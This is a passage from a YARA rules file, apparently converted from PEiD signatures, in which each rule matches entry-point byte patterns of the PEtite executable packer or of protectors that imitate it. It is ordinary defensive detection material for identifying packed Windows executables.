04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 E3 00 00 FF 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 
53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n        $b = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 02 03 03 03 03 04 04 04 04 05 05 05 05 00 70 70 01 00 02 00 03 00 04 00 05 00 07 00 09 00 0D 00 11 00 19 00 21 00 31 00 41 00 61 00 81 00 C1 00 01 01 81 01 01 02 01 03 01 04 01 06 01 08 01 0C 01 10 01 18 01 20 01 30 01 40 01 60 00 00 00 00 01 01 02 02 03 03 04 04 05 05 06 06 07 07 08 08 09 09 0A 0A 0B 0B 0C 0C 0D 0D 10 11 12 00 08 07 09 06 0A 05 0B 04 0C 03 0D 02 0E 01 0F 58 2C 08 50 8B C8 8B D0 81 C1 ?? D2 00 00 81 C2 ?? ?? 00 00 89 20 8B E1 50 81 2C 24 00 ?? ?? ?? FF 30 50 80 04 24 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_v22_Compresor_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_PEtite_2x_level_0: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 
08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v21: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 
67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_PEtite_21_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 
66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 02 03 03 03 03 04 04 04 04 05 05 05 05 00 70 70 01 00 02 00 03 00 04 00 05 00 07 00 09 00 0D 00 11 00 19 00 21 00 31 00 41 00 61 00 81 00 C1 00 01 01 81 01 01 02 01 03 01 04 01 06 01 08 01 0C 01 10 01 18 01 20 01 30 01 40 01 60 00 00 00 00 01 01 02 02 03 03 04 04 05 05 06 06 07 07 08 08 09 09 0A 0A 0B 0B 0C 0C 0D 0D 10 11 12 00 08 07 09 06 0A 05 0B 04 0C 03 0D 02 0E 01 0F 58 2C 08 50 8B C8 8B D0 81 C1 ?? D2 00 00 81 C2 ?? ?? 00 00 89 20 8B E1 50 81 2C 24 00 ?? ?? ?? FF 30 50 80 04 24 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n        $b = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 
00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_PEtite_22_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v22_wwwun4seencompetite_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_vxx: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 
66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n        $b = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_12: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 }\r\n        $b = { ?? ?? ?? ?? ?? ?? 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PackerPetite_v22_Compresor_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?0 ?? 00 6? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 
66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n        $b = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 79 00 00 00 85 C0 74 30 5F 5F 58 5A 8B 4A 0C C1 F9 02 33 C0 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB 9E 45 52 52 4F 52 21 00 43 6F 72 72 75 70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 7E 01 6A 10 8B D8 66 05 77 01 50 52 6A 00 03 1B FF 13 6A FF FF 53 08 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_PEtite_21_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 2B 00 00 00 0D 0A 0D 0A 0D 0A 52 65 67 69 73 74 41 72 65 64 20 74 6F 3A 20 4E 4F 4E 2D 43 4F 4D 4D 45 52 43 49 41 4C 21 21 0D 0A 0D 0A 0D 00 58 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 
8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v12_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v22_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n        $b = { B8 00 ?0 ?? 00 6? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n        $b = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 
6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEtite_v21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n        $b = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEtite_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 
64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_PE_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 6A 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 70 BC 00 00 6A 00 FF 50 1C 8B CC 8D A0 70 BC 00 00 89 61 2E 68 00 00 00 00 51 8B 7C 24 04 8B 33 66 81 C7 80 07 8D 74 1E 08 89 3B 53 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 59 F3 A5 83 C8 FF 8B DF AB 40 AB 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_vxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n        $b = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_v21_2_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? 
?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13a: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 66 9C 60 50 8D 88 00 00 00 00 8D 90 00 00 00 00 8B DC 8B E1 68 00 00 00 00 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DC 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_2: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 00 00 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A 00 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 
51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 79 00 00 00 85 C0 74 30 5F 5F 58 5A 8B 4A 0C C1 F9 02 33 C0 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB 9E 45 52 52 4F 52 21 00 43 6F 72 72 75 70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 7E 01 6A 10 8B D8 66 05 77 01 50 52 6A 00 03 1B FF 13 6A FF FF 53 08 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 